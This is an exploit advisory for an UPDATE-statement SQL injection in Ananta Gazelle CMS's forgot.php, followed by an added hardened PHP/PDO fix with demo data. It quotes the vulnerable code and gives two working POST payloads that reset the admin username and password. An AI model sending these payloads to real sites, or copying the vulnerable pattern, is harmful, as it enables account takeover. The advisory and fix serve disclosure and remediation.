
Ananta Gazelle CMS Update Statement SQL Injection and Fix - Website Security

Title: Ananta Gazelle CMS - Update Statement Sql injection
Author: hackme
Download: http://sourceforge.net/projects/ananta/files/stable/Gazelle 1.0 stable/Ananta_Gazelle1.0.zip/
Affected version: 1.0 stable
Tested on: backbox 2.1

[Sorry for my bad English]

[+] This injection does not let us read table contents, but it does let us run an UPDATE statement against the admin's username and password. Because special characters such as the apostrophe cannot be entered, we cannot set the username and password to values of our choosing; instead we copy the value of a column that has a default value into the username and password columns. In effect we end up with:

    admin - username = 1
          - password = 1

[+] Vulnerable code analysis (forgot.php):
[CODE]
if (!empty($_POST) && !isset($_POST["loginform"])) {
    // form submitted, set a new activation key for this user (however don't set the user to inactive, so no-one can block someone else's account)
    // $_POST["table"] is concatenated into the statement as the table name
    $sql = "UPDATE ".$tableprefix.$_POST["table"]." SET ";
    if ($_POST["activate"] <> "") {
        $sql = $sql."activate='".$_POST["activate"]."'";
    }
    $sql = $sql." WHERE email"."='".$_POST["email"]."'";
    // no control: none of the $_POST values is validated before the query runs
    if (mysql_query($sql)) {
        // ... (the excerpt in the advisory ends here)
    }
}
[/CODE]

[+] default table users columns: number,name,pass,email,activate,active,admin,joindate,showemail

Risk level: High

[+] Vulnerable page: /ananta/forgot.php

[+] Change admin username to "1"
[POST-DATA]
email=&save=Save&table=users SET name=active where number=1--&activate=lol&location=/ananta/forgot.php

[+] Change admin password to "1"
[POST-DATA]
email=v&save=Save&table=users SET pass=md5(active) where number=1--&activate=lol&location=/ananta/forgot.php

[+] ...if you want, you can
[+] Greetz To: MZ
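A hardened form of the forgot.php query, as an added example that is not from the advisory or the Ananta Gazelle code base: the table name is fixed server-side and the `email` and `activate` values are bound as parameters. The function name `set_activation_key`, the use of PDO, and the in-memory SQLite table standing in for the CMS database are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example: hardened form of the forgot.php UPDATE. The function name,
// PDO usage and SQLite demo table are assumptions, not Ananta Gazelle code.
function set_activation_key(PDO $db, string $tablePrefix, array $post): bool
{
    // The prefix comes from configuration, never from the request. Identifiers
    // cannot be bound as parameters, so restrict it to identifier characters.
    if (!preg_match('/\A[A-Za-z0-9_]*\z/', $tablePrefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    $email    = $post['email'] ?? '';
    $activate = $post['activate'] ?? '';
    if (!is_string($email) || !is_string($activate) || $email === '' || $activate === '') {
        return false;
    }
    // The table name is fixed; $post['table'] is deliberately never read.
    $stmt = $db->prepare(
        "UPDATE {$tablePrefix}users SET activate = :activate WHERE email = :email"
    );
    $stmt->execute([':activate' => $activate, ':email' => $email]);
    return $stmt->rowCount() > 0;
}

// Constructed demo data: SQLite table using the column names listed in the advisory.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (number INTEGER PRIMARY KEY, name TEXT, pass TEXT, email TEXT,
           activate TEXT, active INTEGER DEFAULT 1, admin INTEGER, joindate TEXT, showemail INTEGER)");
$db->exec("INSERT INTO users (number, name, pass, email, admin)
           VALUES (1, 'admin', 'constructed-hash', 'admin@example.test', 1)");

// POST data shaped like the advisory's request: the 'table' value is now inert.
$hostile = ['email' => 'v', 'save' => 'Save', 'activate' => 'lol',
            'table' => 'users SET pass=md5(active) where number=1--'];
var_dump(set_activation_key($db, '', $hostile));

// A legitimate request touches only the activate column of the matching row.
$legit = ['email' => 'admin@example.test', 'save' => 'Save', 'activate' => 'k3y'];
var_dump(set_activation_key($db, '', $legit));

// Inspect the admin row after both requests.
$row = $db->query('SELECT name, pass, activate FROM users WHERE number = 1')->fetch(PDO::FETCH_ASSOC);
var_dump($row);
```

The script runs under the PHP CLI with the pdo_sqlite extension enabled; against the real CMS the same prepared statement would be issued over a PDO MySQL connection.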
